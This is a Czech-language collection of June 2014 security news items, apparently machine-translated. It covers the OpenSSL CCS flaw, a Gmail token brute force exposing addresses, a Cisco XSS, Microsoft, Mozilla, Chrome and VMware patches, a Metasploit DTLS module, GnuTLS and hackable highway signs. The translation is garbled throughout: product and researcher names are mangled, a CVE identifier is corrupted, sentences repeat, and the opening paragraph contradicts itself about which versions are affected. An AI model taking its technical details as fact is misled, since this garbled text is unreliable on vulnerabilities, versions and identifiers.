slabých šifrovacích klíčů. To je vážný a snadno zneužitelná zranitelnost, ale je to omezeno tím, že obě strany musí provozovat zranitelnou verzi OpenSSL. Na straně klienta, OpenSSL je zranitelné ve všech verzích. Na straně klienta, OpenSSL verze ve větvi 1.0.1 jsou zranitelné. "Vzhledem k tomu, že prohlížeče obvykle nespoléhejte na OpenSSL, většina uživatelů bude v bezpečí. Nicméně, Android prohlížeč, stejně jako Chrome pro Android, se používají OpenSSL, a by mohly být ovlivněny. Dále OpenSSL je velmi často používán v řádkových utilit, a pro programový přístup. Podle SSL Pulse, asi 24% serverů z našich dat, nastavení použít verzi z větve OpenSSL 1.0.1, "Ivan Ristic, ředitel inženýrství na Qualys, komentoval nebezpečí z CVE-2014-0224 zranitelnost. "Na povrchu, skutečnost, že chyba zabezpečení vyžaduje, muže ve středním polohy pro využití je omezení, ale jako lepší nástroje jsou vyvinuty, automatizace může umožnit snadné masové využití na wi-fi sítí a podobných prostředích. Například, heslo a identifikátor sklizeň z populárních webových stránek by mohla být snadno automatizovat. "


Scans kvantifikovat Zranitelné OpenSSL servery
17.6.2014 Zranitelnosti
Určité faktory snížení rizika z nedávné OpenSSL man-in-the-middle zranitelnost zářez nebo dva pod Heartbleed z hlediska kritického stavu. Díky, že v úvahu, je to asi žádným překvapením, že záplatování úrovně pro CVE-2014-0224 nejsou tak vysoké ven z brány, zatímco oni byli pro Heartbleed.

Ivan Ristic, bezpečnostní aplikace, výzkumník a ředitel inženýrství na Qualys, řekl, že výzkum rameno jeho společnosti, SSL Labs, byla spuštěna možnost dálkové kontroly pro servery ohrožených chyby. Tento týden to běželo, že stejný test proti datové sady vedeném SSL Pulse , globální projekt, který monitoruje kvalitu podpory SSL, aby bylo možné kvantifikovat rozsah problému ovlivňuje všechny verze OpenSSL klienta a verzi 1.0.1 serverového softwaru.

Výsledky nebyly zcela odradí, aby Ristic, který provádí rozsáhlý výzkum SSL.
Výsledky nebyly zcela odradí, aby Ristic, který provádí rozsáhlý výzkum SSL. Srovnání s údaji o SSL Pulse ukázaly, že asi 49 procent serverů zůstávají zranitelné, zatímco 14 procent je zneužitelná.

"Řekl bych, že jste slušný," řekl Ristic výsledků. "Záplatování rychlost není tak dobrá jako u Heartbleed, ale Heartbleed bylo mnohem horší, pokud jde o dopad, a to bylo velmi dobře pokryta."

Skenování ukázalo, že asi 36 procent serverů se systémem starší verze OpenSSL, které nejsou využitelné. Tyto servery příliš, nebude pravděpodobně být oprava v jakékoli naléhavé situace, řekl Ristic. Ristic odhady na základě přítomnosti rozšíření Heartbleed, že 24 procent serverů se systémem zranitelné verze OpenSSL, což znamená, že asi 38 procent se oprava v prvním týdnu.

Chyba se vynořil veřejně 5. června, i když odborníci tvrdili, že je pravděpodobné, že byl v OpenSSL codebase od 1. dne v roce 1998. Chyba umožňuje útočníkovi vzdáleně zneužít klienty nebo servery se systémem zranitelné verze OpenSSL zachytit a dešifrovat provoz. Útočník by musel být v pozici, man-in-the-middle, aby tak učinily, a ne o tom, že chyba může být využit pouze tehdy, pokud útočník sedí mezi oběma zranitelné klientem a serverem.

"To je právě snižuje počet využitelných systémů. Ale já bych řekl, že útok povrch je stále dost velký. Tam je asi spousta věcí backend pomocí OpenSSL přístupem k API a tak, "řekl Ristic z polehčujících faktorů. "Jeden dešifrovat spojení znamená, že heslo je ohrožena."

Adam Langley Google publikoval časné analýzu zranitelnosti ukázal prstem na ChangeCipherSpec zpráv odeslaných během TLS handshake.

"Tato chyba zabezpečení umožňuje aktivní síť útočník aplikovat ChangeCipherSpec (CCS) zpráv na obou stranách spojení a nutí je, aby opravit své klíče do všech klíčových materiál je k dispozici," řekl Ristic. "Slabé klíče jsou sjednány jako výsledek."

Záplatování rychlost není tak dobrá jako u Heartbleed, ale Heartbleed bylo mnohem horší, pokud jde o dopad.


Uživatelé Windows 7 nemusejí mít přístup k aktualizacím IE11

16.6.2014 Zabezpečení, Zranitelnosti
Microsoft na počítače koncových uživatelů a malých firem s Windows 7 potichu přestal poskytovat aktualizace pro Internet Explorer 11 (IE11), pokud si tito nenainstalovali speciální aktualizaci vydanou v dubnu.

Nastala tak podobná situace jako u Windows 8.1, kdy Microsoft řekl svým uživatelům, že musejí na aktualizovanou verzi Windows 8.1 přejít do 10. června, jinak si již nadále nebudou moci stahovat aktualizace. Nyní se požadavek týká jen prohlížeče IE11, ne celého operačního systému. Uživatelé, kteří si nenainstalovali bezpečnostní aktualizaci pro IE vydanou osmého dubna (označenou Microsoftem jako MS14-018) na Windows 7 a spoléhají při instalaci aktualizací na Windows Update, neobdrží aktualizaci pro IE z desátého června ani jakékoli další aktualizace pro tento prohlížeč – Windows Update je jednoduše nebude zobrazovat.

„Tato aktualizace je určena pouze pro počítače s Internet Explorerem 11, které mají nainstalovánu aktualizaci 2919355 (pro Windows 8.1 nebo Windows Server 2012 R2) nebo 2929437 (pro Windows 7.1 nebo Windows Server 2008 R2 SP1),“ stojí v červnovém dokumentu k MS14-035, jenž opravuje v Internet Exploreru 59 děr. „Pro všechny další bezpečnostní i ostatní aktualizace Internet Exploreru 11 je třeba mít nainstalovánu aktualizaci 2919355 či 2929437.“

Jednoduše řečeno: Pokud si uživatelé Windows 7 nenainstalují pro IE11 aktualizaci z osmého dubna, ztrácejí právo na budoucí aktualizace. Stejné pravidlo se dotkne velkých společností po 12. srpnu. Do té doby pro jejich prohlížeče budou vydávány záplaty i bez aplikace dubnového patche. Od 12. srpna však i firmy, které využívají WSUS (Windows Server Update Services), Intune nebo System Center Configuration Manager budou od nových aktualizací pro IE11 odstřiženy, pokud nenainstalují MS14-018.

Stejně Microsoft postupoval i u již zmíněného požadavku na Windows 8.1 – velké firmy taktéž získaly lhůtu prodlouženou o tři měsíce. Společnosti, které svým zaměstnancům zakázaly přístup k IE11 za použití speciálního nástroje vydaného v říjnu minulého roku, nebudou postiženy. Stejně tak se problémům vyhnou i uživatelé IE7, IE8, IE9 a IE10. Podle amerického Computerworldu je to vůbec poprvé, co Microsoft takto selektivně přestává distribuovat opravy pro IE, zatímco i nadále zpřístupňuje aktualizace pro operační systém.

Není zatím jasné, proč k tomuto kroku společnost přistoupila. Dá se však předpokládat, že to souvisí s důležitostí dubnové aktualizace. Dobrou zprávou je, že většina uživatelů, kteří mají nastaveno Windows Update na automatické stahování a instalaci aktualizací, se nemusí ničeho obávat.


Token Stížnost odhaluje Gmail adresy
12.6.2014 Zranitelnosti
Google je oprava zranitelnosti, které zpřístupní neurčitý počet adres Gmail, potenciální zlatý důl pro phishing a pokročilých útoků.

Výzkumník Oren Hafif Izraele zveřejněny podrobnosti o tom, jak se mu podařilo zneužít token vystaven v URL s cílem odhalit každou adresu služby Gmail. Jeho práce mu vynesla 500 dolarů prostřednictvím bug bounty programu Google, řekl.

"Bruteforced jsem token v Gmail URL extrahovat všechny e-mailové adresy hostované na Google," napsal Hafif na svém osobním blogu .

Hafif začal prostřednictvím funkce delegace Gmail Google, která umožňuje držiteli účtu delegovat přístup k ostatním pouhým přidáním dalšího účtu v záložce Nastavení. Tento proces se vrátí ověřovací e-mail o tom, že přístup je čeká buď kliknutím na přijetí nebo odmítnutí odkaz vložený do zprávy. Obě adresy URL jsou téměř identické, minus několik důležitých rozdílů, které Hafif byl schopen využít.

Accept: https://mail[.]google[.]com/mail/mdd-f560c0c4e1-oren.hafif%40gmail.com-bbD8J0t6P6JNOUO36vY6S_pZJy4

Reject: https://mail[.]google[.]com/mail/mda-f560c0c4e1-oren.hafif%40gmail.com-bbD8J0t6P6JNOUO36vY6S_pZJy4

V obou případech, Google nevrátí delegování e-mailovou adresu URL, Hafif řekl, což znamená, že je něco v URL zastupuje adresu. Existují určité oblasti, Hafif soustředily na adresu URL. První MDD a mapování mda, což znamená, pošta delegace přijmout nebo odmítnout. Dále byla posloupnost znaků bezprostředně po mapování, že domněnky je autentizační token. A konečně, sekvence znaků na konci adresy URL, který řekl, je nějaký "kódovaného blob."

Hafif řekl, že první manipuloval s kódovanými bity v URL, a to ještě se vrátil e-mailová adresa je delegována.
Hafif řekl, že první manipuloval s kódovanými bity v URL, a to ještě se vrátil e-mailová adresa je delegována. Příští přišel token, který, jak se ukázalo, byl klíčem k hádance.

"Takže začnu BruteForce - a co ty víš ... jsem si e-mailové adresy, spousta spousta e-mailových adres. Tolik e-mailové adresy, které každý jednotlivý nástroj se používá pro BruteForce zhroutí, "napsal Hafif. "Tak jsem se napsat svůj vlastní podprocesy skript v Ruby - což není tak rychle, jak chci."

Hafif, který je výzkumník s Trustwave SpiderLabs, také všiml, že mnoho e-mailových adres nebyly adresy služby Gmail. On říkal, že on odvodil, že jsou podniky pomocí Google Apps jako poštovní službu, znepokojující expozice.

"To je vlastně docela žhavé téma právě teď. Měli bychom se přesunout do oblak? Měli bychom používat Gmail jako náš organizační e-mail manažer? "Napsal Hafif. "Jako argument o budoucnosti podnikového e-mailu pokračuje se zaměřením na bezpečnost - únik z organizačních e-mailů může pomoci útočníkům v jejich kopí-phishing útokům a nakonec vystavit společnost postoupit přetrvávající hrozby."

Nakonec, Hafif řekl, že se obrátil na OWASP volání nástroj DirBuster slouží k BruteForce adresáře, ale který také obsahuje URL fuzzer. Vložením vlastní-postavený Ruby slovník všech 10 HEX znak dlouhé kombinace tokenů do DirBuster, byl schopen získat všechny platné žetony, které byl schopen přeměnit platné e-mailové adresy pomocí krkat Intruder, webové aplikace útok nástroj.

Jak Hafif poukazuje na to, e-mailové adresy mají významnou hodnotu pro útočníky a to nejen proto, že mohou být použity v phishing a spam kampaně, ale také proto, že jsou často používány jako uživatelské jméno. Změna hesla je relativně jednoduché ve srovnání se změnou e-mailovou adresu, řekl.

"Vaše e-mailová adresa se používá pro ověřování všude," řekl. "Pokud to byl vystaven, může být použit pro přístup k vašemu účtu Google, Facebook účet nebo se snaží proniknout do vašeho smartphonu pomocí Apple ID nebo vašeho Google Play účet jméno."


Cisco Záplaty XSS Chyba v zabezpečení spotřebiče
12.6.2014 Zranitelnosti
Je tu odráží cross-site scripting zranitelnost v řadě Cisco bezpečnostních zařízení, které umožňuje vzdálený, neověřený útočníkovi spustit libovolný kód v kontextu uživatele.

Tato chyba ovlivňuje Cisco Email Security Appliance, Cisco Web Security Appliance a Content Management Security Appliance. Cisco vydala aktualizovaný software opravit chybu pro každý z dotčených zařízení. Problém spočívá v AsyncOS, operačním systému, který běží na bezpečnostních zařízení Cisco.

Problém spočívá v AsyncOS, operačním systému, který běží na bezpečnostních zařízení Cisco.
"Cisco AsyncOS, základní operační systém pro Cisco Email Security Appliance, Web Security Appliance, a Content Management Appliance zabezpečení, obsahuje odražené cross-site scripting zranitelnost ve zprávách přehledové stránce rozhraní pro správu. Útočník je schopen načíst libovolný skript v kontextu uživatelova prohlížeče přes období DATE_RANGE parametru " poradní říká z CERT / CC na Carnegie Mellon University.

Tato chyba ovlivňuje následující produkty společnosti Cisco:

Cisco Email Security Appliance 8.0 a starší
Cisco Web Security Appliance 8.0 a starší
Content Security Management Appliance 8.3 a starší
Cisco úředníků řekl, že chyba zabezpečení by mohla být zneužita pomocí jednoduchého škodlivého URI.

"Zranitelnost je důsledkem nedostatečné vstupní validace parametru. Útočník by mohl zneužít tuto chybu zabezpečení tím, že přesvědčí uživatele, aby přístup na nebezpečný odkaz, "Cisco poradní říká.

CERT / CC radí zákazníkům, kteří nemohou provést aktualizaci okamžitě, zvážit omezení přístupu pouze na důvěryhodných hostitelů.

"Jako obecně dobré bezpečnostní praxi, umožňují pouze spojení z důvěryhodných hostitelů a sítí. Všimněte si, že omezení přístupu nebrání XSS a CSRF útoky, protože útok přijde jako HTTP požadavku z počítače oprávněný uživatel je. Omezení přístupu by zabránit útočníkovi v přístupu na webové rozhraní pomocí odcizených pověření od blokovaného umístění v síti, "říká poradní.


Microsoft záplaty IE8 Zero Day, Critical Word Bug
12.6.2014 Zranitelnosti
Jak se dalo očekávat, Microsoft vydal záplatu dnes pro zero-day zranitelnosti v aplikaci Internet Explorer 8 , který byl popsán u Zero Day Initiative společnosti HP před třemi týdny, šest měsíců poté, co byla oznámena ZDI.

IE8 oprava, MS14-035 , je zahrnuta v kumulativní Internet Explorer kumulativní, že záplaty 59 chyby v prohlížeči. Většina z nich jsou na dálkové spuštění kódu chyby válcovací celou cestu zpět do IE 6 běží na Windows Server 2003 SP2.

Nula den ovlivňuje pouze IE 8, který postrádá některé využívají snižující závažnost rizika v novějších verzích prohlížeče. Microsoft květnu řekl, že si je vědoma tohoto problému.

"I když žádné útoky byly zjištěny v přírodě, poradenství ZDI dal útočníkům náskok pochopit tuto chybu zabezpečení, případně snížit čas potřebný pro výzkumné pracovníky, aby zpětně opravy a navrhnout využití kódu," řekl Craig Young, bezpečnostní výzkumník Tripwire.

Sedm bulletiny byl propuštěn dnes, jeden další kritický stupeň závažnosti, a pět hodnocené důležité.
Sedm bulletiny byl propuštěn dnes, jeden další kritický stupeň závažnosti, a pět hodnocené důležité.

Odborníci vyzývají správci IT, aby se blíže podívat na bulletinu pro Microsoft Word, MS14-034 , který zároveň hodnocené důležité Microsoft, by měl být další nejvyšší prioritou záplatování za IE.

Ovlivnění Microsoft Word 2007, uživatelé by mohli být vystaveni vzdálené spuštění kódu, pokud využije škodlivý dokument aplikace Word se otevře na zranitelné počítače.

"Microsoft rates to pouze" důležité ", protože je interakce s uživatelem nutné, je třeba otevřít soubor aplikace Word, ale umožňuje útočníkovi vzdálené spuštění kódu. Kromě toho, útočníci se staly velmi zručný v podvádět uživatele k otevření souborů, "řekl Qualys CTO Wolfgang Kandek. "Kdo by nechtěl otevřít dokument, který přináší nové informace o penzijním plánem společnosti? Word zranitelnost je v novějším formátu DOCX souborů a platí pouze pro verzi 2007. Používáte-li novější verze Office / Word 2010 nebo 2013, které nejsou ovlivněny. "

Druhým zásadním bulletin, MS14-036 , nášivky vzdálené spuštění kódu chyby v Microsoft grafiky v sadě Office a Lync, která by mohla být zneužita uživateli návštěvě škodlivé webové stránky nebo otevření nebezpečného souboru Office.

"Grafika rozebrat vyžaduje komplexní logiku a je často spojován s vektorů útoku," řekl Kandek. "To se týká Windows, Office a klient Lync chatu, protože všichni přinést své vlastní kopie."

Tento měsíc přinést 2014 je celkový počet bulletinů vydaných společností Microsoft na 36, ​​což je výrazně pod loňskou tempem 46 až červnu.

"Jsme si zvykli vidět kolem 100 bulletiny zabezpečení pro produkty společnosti Microsoft za rok, ale vypadá to, jako bychom byli v pro méně letos. To je v rozporu s obecnou tendencí roku, který již viděl své akcie velkých porušení, 0-dnů a velké Heartbleed chybu v OpenSSL, "řekl Kandek. "Možná, že sníží počet je založen na zvýšenou přítomnost zranitelnosti makléřů, které nakupují do zranitelná místa pro interní použití? Uvidíme, jak se druhá část roku se vyvíjí. "

Zbývající bulletiny jsou hodnoceny důležité a zahrnuje dvojici zveřejňování informací chyb, jeden odmítnutí služby chyby a manipulace zranitelnosti.

MS14-033 řeší zpřístupnění informací zranitelnost ve službě Microsoft XML Core Serivces; využít na stránkách určené pro vyvolání XML Core Services přes IE může dojít k úniku dat do útočníkem.
MS14-032 také záplaty informační zveřejňování chyba v Microsoft Lync Server. By mohla být zneužita uživateli napálil do spojení schůzku Lync klepnutím na škodlivý setkání URL.
MS14-031 opravuje chybu denial-of-service v TCP. Útočník odesílání škodlivý sekvence paketů do cílového systému může způsobit, že pád.
MS14-030 nášivky chybu zabezpečení v Remote Desktop, která by mohla umožnit falšování, řekl Microsoft. Pokud útočník má muže ve středním přístup ke stejnému segmentu sítě jako cílené systému při RDP relace a odesílá škodlivé RDP pakety, mohli by tuto chybu zabezpečení zneužít.
Adobe Patche Flash Player

Adobe vydala novou verzi přehrávače Flash Player, která řeší kritickou chybu v software.

Flash 13.0.0.214 a jsou ovlivněny starší verze pro Windows a Macintosh a Adobe Flash Player 11.2.202.359 a starších verzích pro Linux.

Adobe řekl, že neexistují žádné aktivní využije proti těmto chybám zabezpečení.


Mozilla Patche Sedm Nedostatky ve Firefoxu 30
12.6.2014 Zranitelnosti
Mozilla stanovila sedm bezpečnostní chyby ve Firefoxu 30, včetně pěti kritických chyb, které by mohly umožnit vzdálené spuštění kódu.

Firefox 30 je relativně menší verze populárního prohlížeče, s Nejvýznamnější změnou je přidání tlačítka v boční liště, která umožňuje uživatelům rychlý přístup k sociálním a bookmarking stránky. Nová verze také obsahuje postranní panel, který umožňuje uživatelům sledovat akci na mistrovství světa, jak se to stane.

Mezi opravy zabezpečení je pět kritických zranitelností, které zahrnují tři use-po-bez chyby a přetečení vyrovnávací paměti. Vnitřní vývojářů Mozilly také identifikovala řadu korupčních paměť zabezpečení, které byly stanoveny ve Firefoxu 30.

"Vývojáři Mozilly a komunita identifikovány a pevné několik bezpečnostních chyb v paměti prohlížeče motoru používaných ve Firefoxu a dalších produktů založené na Mozille. Některé z těchto chyb prokázala poškození paměti za určitých okolností, a my předpokládáme, že s dostatečným úsilím alespoň některé z nich by mohla být zneužita ke spuštění libovolného kódu, "říká zpravodaj zabezpečení.

Zde je kompletní seznam bezpečnostních chyb opravených v Firefox 30 :

MFSA 2014-54 Buffer overflow v Gamepad API

MFSA 2014-53 Buffer overflow v Web Audio Speex Resampler

MFSA 2014-52 Use-po-free s SMIL animace Controller

MFSA 2014-51 Use-po-zdarma posluchač události Správce

MFSA 2014-50 Clickjacking pomocí kurzoru invisability po vzájemné Flash

MFSA 2014-49 Use-po-free a mimo hrací plochu otázky nalézt pomocí adresy Sanitizer

MFSA 2014-48 bezpečnostní Různé paměti nebezpečí (rv: 30,0 / rv: 24.6)

Mezi vysoce dopadu chyb opravených v této verzi je chyba zabezpečení, která za určitých velmi specifických okolností, by mohlo vést k clickjacking útoku.

"Bezpečnostní výzkumník Jordi kněžiště hlášeny mechanismus, kde lze kurzor vykreslen neviditelný poté, co byl použit na vestavěné flash objektu při použití mimo objekt. Tato chyba může být použit v kombinaci s obrazem kurzoru manipulovat prostřednictvím JavaScriptu, což vede k clickjacking v průběhu interakce s obsahem HTML následně. Tento problém se týká pouze OS X a není k dispozici v systémech Windows nebo Linux, "řekl poradní Mozilly.

Google Patche Nedostatky v Chrome

Také v úterý, Google opravil několik zranitelností v Chrome 35 , včetně vysoce rizikových nedostatky. Společnost rozdal 2,500 dolarů v odměnách pro výzkumné pracovníky, stejně. V opravených v prohlížeči zahrnují:

[1000 dolarů] [ 369525 ] High CVE-2014-3154:. Use-po-free do souborového systému API Credit Collin Payne.
[1000 dolarů] [ 369539 ] High CVE-2014 do 3155: Out-of-hranice četl v SPDY. kreditů James března Daniel Sommermann a Alan Frindell Facebooku.
[500 dolarů] [ 369621 ] Střední CVE-2014-3156: Přetečení vyrovnávací paměti ve schránce. Kredit Atte Kettunen z OUSPG.


VMware ESXi Záplaty proti OpenSSL chybu, ale mnoho dalších

12.6.2014 Zranitelnosti
Zatímco skupina zabezpečení, které projekt OpenSSL oprava minulý týden nebyl rozrostla do druhu nepořádku, že Heartbleed chyba dělal, že zranitelnost stále vliv na širokou škálu výrobků. Prodejci jsou stále dělá jejich cestu přes proces strakatostí a VMware vydala poradní potvrzuje, že dlouhý seznam svých produktů, jsou náchylné k nejnovějším OpenSSL chyby.

Společnost uvedla, v poradenství , které je pouze oprava k dispozici pro jeden ze svých produktů právě teď, ESXi 5.5. VMware prodává velký sortiment výrobků, který zahrnuje jak klienty a servery, které činí proces záplatování pro nejzávažnější z nedávných OpenSSL zranitelnosti dokonce více obtížný. Kritická zranitelnost v této skupině je CVE-2014-0224, chyba, která by mohla umožnit útočníkovi, aby zachytit a dešifrovat komunikaci mezi zranitelné klienty a zranitelné serveru. Jak klient a server musí být spuštěn chybné verze softwaru, aby k útoku uspět.

VMware uvedl ve svém zpravodaji, že různé produkty jsou ovlivněny odlišně zranitelnosti.
VMware uvedl ve svém zpravodaji, že různé produkty jsou ovlivněny odlišně chybou postiženy, v závislosti na tom, zda se chováš jako klientů nebo serverů.

"CVE-2014-0224 může vést k útoku typu man-in-the-Middle, pokud je spuštěn server ohroženou verzi OpenSSL 1.0.1 a klienti se systémem ohroženou verzi OpenSSL 0.9.8 nebo 1.0.1. Aktualizace serveru zmírní tento problém pro server i všech postižených klientů, "říká poradní.

"CVE-2014-0224 může mít vliv na produkty odlišně v závislosti na tom, zda výrobek funguje jako klient nebo server a která verze OpenSSL produkt je using.Clients, které komunikují přes nedůvěryhodné sítě, jako jsou veřejné Wi-Fi připojení na internet a komunikovat s server běží na ohroženou verzi OpenSSL 1.0.1. lze zmírnit pomocí zabezpečené sítě, jako je VPN. "

Seznam dalších produktů VMware, které jsou stále zranitelné vůči CVE-2014-0224 a pro které dosud nejsou k dispozici žádná oprava je dlouhý a zahrnuje klienty i servery. Společnost uvedla, že záplaty pro tyto výrobky, které obsahují jiné verze ESXi, několik verzí vCenter a vSphere, na kterých se pracuje.

VMware uvedl ve svém zpravodaji, že různé produkty jsou ovlivněny odlišně zranitelnosti


Metasploit nyní obsahuje modul pro využití CVE-2014-0195 (OpenSSL DTLS Fragment vuln.)
12.6.2014 Zranitelnosti

Nejnovější verze Metasploit dnes vydala obsahuje modul pro usnadnění využívání CVE-2014 až 0195. Tato chyba zabezpečení při provádění DTLS z OpenSSL byla náplast minulý týden a nedostal pozornost MITM zranitelnost dostal, že byla oprava ve stejnou dobu. Je naprosto nezbytné, abyste náplast a / nebo firewall své DTLS služby. To je složité koupit skutečnost, že mnohé z nich jsou součástí embeded zařízení, jako jsou směrovače a přepínače (SNMPv3) nebo VoIP systémy. Vaše webové servery nejsou dotčena.

Metasploit modul ve své současné podobě neumožňuje spuštění kódu, ale místo toho bude jen pád službu. Vulnerablity by však mohla být použita ke spuštění kódu na cílovém zařízení.

Zde opět rychlý přehled případně ovlivněných protokolů:

SNMPv3 (161/UDP), LDAP přes SSL (636/UDP), DTLS-SRP (VoIP, WebRTC, různé porty), OpenVPN (1194/UDP)

DTLS používá UDP přes různé porty. Některé z protokolů uvedených výše, např. DTLS-SRP, používat různé porty, které jsou sjednány mezi koncovými body dynamicky. DTLS také používá port 4433 pro některé aplikace.

[1] http://www.rapid7.com/db/modules/auxiliary/dos/ssl/dtls_fragment_overflow


BIND Aktualizace zabezpečení CVE-2014-3859
12.6.2014 Zranitelnosti
BIND vydala aktualizaci zabezpečení ( CVE-2014-3859 ) pro verzi 9.10.0-p2, 9.9.5-P1, 9.8.7-P1. Aktualizace je k dispozici ke stažení zde .


Microsoft Updates 06. 2014 - Téměř 60 IE a GDI + / TrueType RCE
11.6.2014 Zranitelnosti

Microsoft opravuje menší sadu softwarového kódu výrobku tento měsíc za "kritické" slabá místa, a několik pro "Důležité" opravy s MS014-030 přes MS014-036. Ale hej, téměř 60 Vzdálené spuštění kódu nedostatky existují v šesti verzích aplikace Internet Explorer a složek společnosti, které činí písma ve vašem systému! Nejen, že je to velmi dlouhý seznam otázek, týkající se poškození paměti, ale jeden z hlášení chyb, tj. připsány na Petera Van Eeckhoutte, je přes 180 dní. Oprava a testování úsilí musí být velký jeden v posledních několika měsících.

Společnost Microsoft vydává dvě kritické Bulletiny dnes pro Internet Explorer (na systémech klienta Windows, ale důležité na serverech) a GDI +, a pět důležitých bulletiny pro Microsoft Word, síťový zásobník (TCP), jejich IM systém Lync, a komponenty MSXML používá internet Explorer.

IE 0 dnů hlášeno 180 dny před ještě je další "use-after-free" zranitelnost umožňující IE kódu v manipulaci javascript CMarkup objektů. Zatímco chyba v hledáčku si myslel, že zranitelnost ovlivněn Internet Explorer 8, CVE-2014-1.770 opravy Microsoft v MS014-035 jsou hodnoceny jako kritická pro RCE přes IE 6,7,8,9,10 a 11 na klienty Windows a hodnotili mírné na Windows servery. To bylo veřejně oznámeno, a zvyšuje riziko využívání ITW. Zatím jsme nezjistili související 0den používán, ale budeme pokračovat v přezkumu naše data.

MS014-035 také vyplývá záplavu diskuse na heartbleed zranitelnosti s jiným TLS Věstníku. Tým výzkumníků, včetně jednoho z Microsoft Research, zveřejnila zásadní dokument s názvem "Triple stisky rukou a Vykrajovátka: Prolomit a Upevňovací ověřování přes TLS" . Podrobně řadu šifrovaných síťových relací MITM útoků umožněná TLS implementace od společnosti Microsoft, Google, Apple a Mozilla. Tento bulletin je Microsoft fix pro vlastní kód - ostatní použití implementace GnuTLS, OpenSSL, a GNU SASL.

Tento měsíc v kritickém jmenovitém vuln Zajímavá je řada software, jichž se dvěma TrueType manipulaci font chyby záplaty s MS014-036 - Usp10 (stejné dll provádění "Uniscribe"), GDI +, gdi32, DirectWrite, Microsoft Office 2007 a 2010 software (ne však Úřad pro Mac 2011), Live Meeting 2007 konzoly a Lync 2010 a software 2013. To je široká distribuce kódu v uživatelském režimu. Předpokládám, že se jedná o pár dalších důvodů, aby čtení všech vašich e-mailu ve formátu prostého textu.

Následujte mě na Twitteru
Konečně, to je velmi důležité pro podnikové administrátory věnovat pozornost Microsoft probíhající práce bojová deset let staré Pass-the-hash techniky , o čemž svědčí včerejší diskuse o APT zprávy skupiny v Šanghaji, také známý jako MsUpdater nebo Putter Panda a tři týdny staré obvinění APT Pekingu skupiny, která zahrnuje Ošklivé Gorilla a členy komentář Crew .
Oddělte od pravidelného cyklu aktualizací, KB2871997 byl propuštěn před pár týdny. To platí pro většinu verzí jejich platformě Windows v podnikovém prostředí - Windows 7, Windows 8, Windows Server 2008R2 a Windows Server 2012, ale bohužel ne všechny. Mezi nové funkce poskytují "Chráněné Users" skupiny tím, že nahradí v minulosti schémata ověřování pomocí protokolu Kerberos pro vybrané uživatele, omezeném režimu admin RDP a LSA pověření vyčištění. Poskytují pokyny pro kontrolu WDigest použití v protokolech DC / server, a zároveň nadstavby útočníků obsahovat funkce, které změnit nebo odstranit události z těchto protokolů, je velmi důležité sledovat pro označení anomální WDigest činnosti.


Kritická chyba v GnuTLS knihovna Crypto mohla umožnit spuštění škodlivého spuštění kódu
10.6.2014 Zranitelnosti
Další kritická chyba v open source SSL / TLS (a DTLS) šifrovací knihovna byla objevena a záplatované minulý týden. Postižené knihovna je GnuTLS, a je používán v mnoha linuxových operačních systémů, jakož i několik stovek softwarových balíků Linux. "chyba byla nalezena v cestě GnuTLS analyzován ID relací ze serveru Hello paketech TLS / SSL metodou handshake. škodlivý server nemohl použít tuto chybu odeslat příliš dlouhý Session ID hodnotu a vyvolat přetečení bufferu ve spojovacím TLS / SSL klienta s gnutls, přimět to, aby pád nebo případně spustit libovolný kód, "vysvětlil Tomáš Hoger na příspěvek na Red Hat Bug Tracker. "chyba je v read_server_hello () / _gnutls_read_server_hello (), kde je session_id_len kontrolována tak, aby nepřekračoval příchozí velikost paketu, ale není kontrolována, aby bylo zajištěno, že nepřekročí maximální délku relace id." chyba (CVE- 2014-3466) byl objeven Codenomicon výzkumník Joonas Kuorilehto. Patch byl vytvořen pomocí GNU TLS vývojáře Nikos Mavrogiannopoulos a organizace GnuTLS byl vytlačen nové verze GnuTLS (3.1.25, 3.2.15, 3.3.4), na které jsou uživatelé doporučujeme provést aktualizaci co nejdříve. Za technické Analýza na chyby, podívejte se na oficiální blog Radare je, pokud se ukáže, že chyba může skutečně být využity v reálném světě útoky. Problém zřejmě již řešeny v Red Hat Enterprise Linux 5 a 6, Fedora 20. se na Debian Projekt byl také vyřešen problém a doporučuje uživatelům aktualizovat své gnutls26 balíčky.


ICS-CERT varuje před Snadno hackable dopravních značkách
9.6.2014 Zranitelnosti
Nový, vzdáleně zneužít zranitelnosti v softwaru Daktronics "Vanguard by to bylo ještě jednodušší pro útočníkům proniknout elektronických dopravních značek, úkol, který byl údajně nikdy velmi obtížné začít.

Dynamický dálnice v konfigurační zprávě znamení software Daktronics "Vanguard byl původně řekl, aby obsahoval pevný kódované pověření minulý týden. Společnost, která vyrábí software se proti tomuto tvrzení s tím, že pověření nejsou pevně, ale pouze výchozí pověření, které mohou být změněny osoby odpovědné za zachování znamení běží na softwaru Vanguard.

Podle výstrahy vydané ministerstva pro vnitřní bezpečnost Industrial Control System Cyber ​​Emergency Response Team (ICS-CERT), je proof-of-concept útoku k dispozici on-line, které lze sledovat vzdáleně měnit znamení zpráv. ICS-CERT se radí, že ti v kontrole příznaků běží Software obsahující tuto chybu "přezkum znamení zpráv, aktualizujte přístupové přihlašovací údaje, a ztvrdnout komunikační cesty na znamení."

Za účelem odstranění tohoto problému, Daktronics a Federal Highway Administration radí, že Vanguard displeje nejsou přítomny na veřejně přístupných IP adresy. Zobrazí se, oni říkají, by měl být na privátní síti nebo VPN. Dále se doporučuje, aby správci zakázat Telnet, webové stránky a webové rozhraní, LCD, když nejsou potřeba, a co nejdříve změnit výchozí heslo na silný na všech instalovaných zařízení.

Kromě těchto, ICS-CERT se dále doporučuje, aby dotčené strany minimalizovat expozici sítě pro všechny řídící systémy, takže nejsou připojeny k širší internetu. Správci by také měli ujistit, aby všechny takové zařízení za firewallem a izolovat je od obchodní sítě. Kdy a jestli jsou nutné pro vzdálený přístup k systémům, ICS-CERT pokračuje, by se uživatelé připojují pomocí zabezpečeného metody jako VPN.


Cupid využívá Heartbleed chybu na WiFi sítě a Android
9.6.2014 Zranitelnosti
